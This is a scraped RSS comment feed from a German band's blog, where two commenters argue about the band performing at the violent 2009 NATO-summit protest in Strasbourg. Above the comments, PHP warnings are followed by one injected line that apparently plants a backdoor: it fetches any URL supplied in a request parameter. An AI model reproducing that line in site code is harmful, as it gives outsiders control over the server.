Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Kommentare zu: Das ist der Gipfel - 60 Jahre NATO-Draht! http://www.blog.schroeder-roadshow.de/?p=666 Rock'n'Roll-Chansons vom Hinterhof der Träume Tue, 21 Nov 2017 04:16:01 +0000 http://wordpress.org/?v=2.7.1 hourly 1 Von: vladi http://www.blog.schroeder-roadshow.de/?p=666&cpage=1#comment-27 vladi Thu, 09 Apr 2009 19:58:20 +0000 http://www.blog.schroeder-roadshow.de/?p=666#comment-27 ......und Kostantin Wecker war nicht da. Failed, ……und Kostantin Wecker war nicht da.
Failed,

]]>
Von: vladi http://www.blog.schroeder-roadshow.de/?p=666&cpage=1#comment-26 vladi Thu, 09 Apr 2009 19:54:44 +0000 http://www.blog.schroeder-roadshow.de/?p=666#comment-26 Mein lieber Claude, uns vor einen Karren spannen zu lassen, würden wir Esel niemals tun. Aber zu Hause zu sitzen und die Schnauze zu halten - nicht mal ein herzergreifendes Koooooommm, Kooooommm abzuliefern - nur weil , wie Du richtig bemerkt hast, Dummheit sich allerorts bis zur Ekstase steigert - wo kommen wir da hin? Es waren viele Menschen in Strasbourg und Kehl, die friedlich demonstriert haben....viele davon vor der Bühne. Und für diese Menschen und für ihre Ohren und für ihre gute Laune waren wir da. Grüsse Vladi Mein lieber Claude,
uns vor einen Karren spannen zu lassen, würden wir Esel niemals tun. Aber zu Hause zu sitzen und die Schnauze zu halten - nicht mal ein herzergreifendes Koooooommm, Kooooommm abzuliefern - nur weil , wie Du richtig bemerkt hast, Dummheit sich allerorts bis zur Ekstase steigert - wo kommen wir da hin?
Es waren viele Menschen in Strasbourg und Kehl, die friedlich demonstriert haben….viele davon vor der Bühne. Und für diese Menschen und für ihre Ohren und für ihre gute Laune waren wir da.
Grüsse
Vladi

]]>
Von: claude. http://www.blog.schroeder-roadshow.de/?p=666&cpage=1#comment-25 claude. Wed, 08 Apr 2009 22:23:46 +0000 http://www.blog.schroeder-roadshow.de/?p=666#comment-25 Ein ernstes Wort - weil euch meine Sympathien gelten. Nach der sog. Demonstration in Straßburg - s.o. - befürchte ich auch , daß eine "andere Welt möglich ist", wie es immer so nett formuliert wird, aber in dieser möchte ich nicht leben - und Ihr ganz bestimmt auch nicht. Von daher ist es mit unverständlich, sich vor einen solchen Karren spannen zu lassen, mehr, ihn sogar noch freiwillig zu ziehen. Wenn der politische Gegner - wer auch immer das gerade ist! - mit Steinen beworfen wird, Apotheken und Kioske angezündet werden, dann ist das nicht nur einfach "daneben", sondern setzt auch günstigen Wind für eine sowieso immer gewaltbereiter werdende Gesellschaft. Warum nur tun wir uns so schwer, unsere Atomwaffenarsenale endlich aufzulösen, von dieser Erde zu verbannen? Genau hier liegt der Grund! Es mag schon sein, daß das Geld und die Macht ungleichmäßig verteilt sind. Na und? Drei Dinge sind auf diesem Planeten jedenfalls perfekt normalverteilt: 1. Ärger (Arroganz) , 2. Habgier (sinnlose) und 3. Dummheit (ein unendlich weites Feld). Das Wort "Demut" fiel hier irgendwann einmal. Es bedeutet, diese drei Eigenschaften für sich selbst anzuerkennen, und aufrichtig zu versuchen, ihnen etwas entgegenzusetzen; alles andere ist nur Koketterie und Spielerei mit Worthülsen. Es gibt und gab immer wieder Leute, die das verstanden haben. Auch der Herr Konstantin Wecker schrieb vor fast 30 Jahren folgendes: \\ Immer noch werden Hexen verbrannt auf den Scheiten der Ideologien \\ und dann kann man als der Gute und die Augen voll Sand in die heiligen Kriege ziehn. Krieg bleibt Krieg, gegen wen auch immer; Gewalt kreiert immer nur weitere Gewalt. Und um ein Held zu werden, braucht man gar keine Kriege.... just my 2 cents. Ich wünsch Euch was. Ein ernstes Wort - weil euch meine Sympathien gelten.

Nach der sog. Demonstration in Straßburg - s.o. - befürchte ich auch , daß eine “andere Welt möglich ist”, wie es immer so nett formuliert wird, aber in dieser möchte ich nicht leben - und Ihr ganz bestimmt auch nicht. Von daher ist es mit unverständlich, sich vor einen solchen Karren spannen zu lassen, mehr, ihn sogar noch freiwillig zu ziehen.

Wenn der politische Gegner - wer auch immer das gerade ist! - mit Steinen beworfen wird, Apotheken und Kioske angezündet werden, dann ist das nicht nur einfach “daneben”, sondern setzt auch günstigen Wind für eine sowieso immer gewaltbereiter werdende Gesellschaft.

Warum nur tun wir uns so schwer, unsere Atomwaffenarsenale endlich aufzulösen, von dieser Erde zu verbannen? Genau hier liegt der Grund!

Es mag schon sein, daß das Geld und die Macht ungleichmäßig verteilt sind. Na und? Drei Dinge sind auf diesem Planeten jedenfalls perfekt normalverteilt: 1. Ärger (Arroganz) , 2. Habgier (sinnlose) und 3. Dummheit (ein unendlich weites Feld).

Das Wort “Demut” fiel hier irgendwann einmal. Es bedeutet, diese drei Eigenschaften für sich selbst anzuerkennen, und aufrichtig zu versuchen, ihnen etwas entgegenzusetzen; alles andere ist nur Koketterie und Spielerei mit Worthülsen. Es gibt und gab immer wieder Leute, die das verstanden haben.
Auch der Herr Konstantin Wecker schrieb vor fast 30 Jahren folgendes:

\\ Immer noch werden Hexen verbrannt auf den Scheiten der Ideologien \\ und dann kann man als der Gute und die Augen voll Sand in die heiligen Kriege ziehn.

Krieg bleibt Krieg, gegen wen auch immer; Gewalt kreiert immer nur weitere Gewalt. Und um ein Held zu werden, braucht man gar keine Kriege….

just my 2 cents.
Ich wünsch Euch was.

]]>